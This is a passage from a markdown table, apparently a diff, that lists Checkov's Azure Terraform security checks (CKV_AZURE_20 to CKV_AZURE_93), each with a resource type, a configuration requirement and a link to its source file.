[SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | -| 1230 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | -| 1231 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | -| 1232 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | -| 1233 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1234 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1235 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | 
-| 1236 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) |
-| 1237 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) |
-| 1238 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) |
-| 1239 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) |
-| 1240 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) |
-| 1241 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) |
-| 1242 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) |
-| 1243 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) |
-| 1244 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) |
-| 1245 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) |
-| 1246 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) |
-| 1247 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) |
-| 1248 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) |
-| 1249 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) |
-| 1250 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) |
-| 1251 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) |
-| 1252 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) |
-| 1253 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) |
-| 1254 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) |
-| 1255 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) |
-| 1256 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) |
-| 1257 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) |
-| 1258 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) |
-| 1259 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) |
-| 1260 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) |
-| 1261 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) |
-| 1262 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) |
-| 1263 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) |
-| 1264 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) |
-| 1265 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) |
-| 1266 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) |
-| 1267 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) |
-| 1268 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) |
-| 1269 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) |
-| 1270 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) |
-| 1271 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) |
-| 1272 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) |
-| 1273 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) |
-| 1274 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) |
-| 1275 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) |
-| 1276 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) |
-| 1277 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) |
-| 1278 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) |
-| 1279 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) |
-| 1280 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) |
-| 1281 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) |
-| 1282 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) |
-| 1283 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) |
-| 1284 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) |
-| 1285 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) |
-| 1286 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) |
-| 1287 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) |
-| 1288 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) |
-| 1289 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) |
-| 1290 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) |
-| 1291 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) |
-| 1292 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) |
-| 1293 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1294 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1295 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1296 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1297 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1298 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) |
-| 1299 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) |
-| 1300 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) |
-| 1301 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) |
-| 1302 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) |
-| 1303 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) |
-| 1304 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) |
-| 1305 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) |
-| 1306 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) |
-| 1307 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) |
-| 1308 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) |
-| 1309 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) |
-| 1310 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) |
-| 1311 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) |
-| 1312 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) |
-| 1313 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) |
-| 1314 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) |
-| 1315 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) |
-| 1316 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) |
-| 1317 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) |
-| 1318 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) |
-| 1319 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) |
-| 1320 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) |
-| 1321 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) |
-| 1322 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) |
-| 1323 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) |
-| 1324 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) |
-| 1325 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) |
-| 1326 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) |
-| 1327 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) |
-| 1328 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) |
-| 1329 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) |
-| 1330 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) |
-| 1331 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) |
-| 1332 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) |
-| 1333 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) |
-| 1334 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) |
